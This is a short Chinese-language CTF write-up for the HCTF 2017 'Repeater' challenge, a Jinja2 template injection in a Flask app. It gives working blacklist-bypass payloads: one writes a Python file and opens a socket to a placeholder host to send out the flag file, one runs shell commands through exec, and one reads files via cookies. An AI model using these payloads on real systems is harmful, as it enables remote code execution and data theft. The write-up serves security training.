2017HCTF-WriteupRepeater
題目是根據原文魔改的
打開題目F12發現server為
Server: Werkzeug/0.12.2 Python/2.7.12
然后發現輸入x就返回x was not found.
差不多可以想到jinja模板注入問題
測試
secret={\{2-1}}
返回1 was not found.即可驗證
由于也是黑名單過濾,繞過方式看師傅們的姿勢
request.args過濾了
空格(%20),回車(%0a),'__','[',']','os','"',"|[a-z]"
直接構造是可以bypass的
空格可以用tab(%09)繞過,|后不允許接a-z可以用%0c,tab等繞過,os可以通過python中exec繞過
但是這題過濾僅限于request.args但是不允許post
簡單的辦法是可以用request.cookies來繞過
只能讀文件的方法要找flag首先需要先到/etc/passwd看到有hctf用戶,然后讀取/home/hctf/.bash_history,發現flag路徑/h3h3_1s_your_flag/flag,在讀取flag
隨便列幾種解題方法
1.不用blask_list里的符號
secret={\%set%0ca,b,c,d,e,f,g,h,i=request|%0cattr(request.args.class|%0cformat(request.args.a,request.args.a,request.args.a,request.args.a))|%0cattr(request.args.mro|%0cformat(request.args.a,request.args.a,request.args.a,request.args.a))%}{\{(i|%0cattr(request.args.subc|%0cformat(request.args.a,request.args.a,request.args.a,request.args.a))()).pop(40)(request.args.file,request.args.write).write(request.args.payload)}}{\{config.from_pyfile(request.args.file)}}&class=%s%sclass%s%s&mro=%s%smro%s%s&subc=%s%ssubclasses%s%s&usc=_&file=/tmp/foo.py&write=w&a=_&payload=import%0csocket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('xxx.xxx.xxx.xxx',2333));s.send(open('/h3h3_1s_your_flag/flag').read());復制2.exec構造繞過’os’執行os系統命令
`a='import\x0co'+'s;o'+'s.system(\'ls${IFS}/\')';exec(a)`3.通過request.cookies
Url: http://repeater.2017.hctf.io/?secret={\{request|%0cattr(request.cookies.class)|%0cattr(request.cookies.mro)|%0clast()|%0cattr(request.cookies.sub)()|%0cattr(request.cookies.getitem)(40)(request.cookies.file)|%0cattr(request.cookies.read)()}}
Cookie: file=/h3h3_1s_your_flag/flag;class=__class__;mro=__mro__;sub=__subclasses__;getitem=__getitem__;read=read;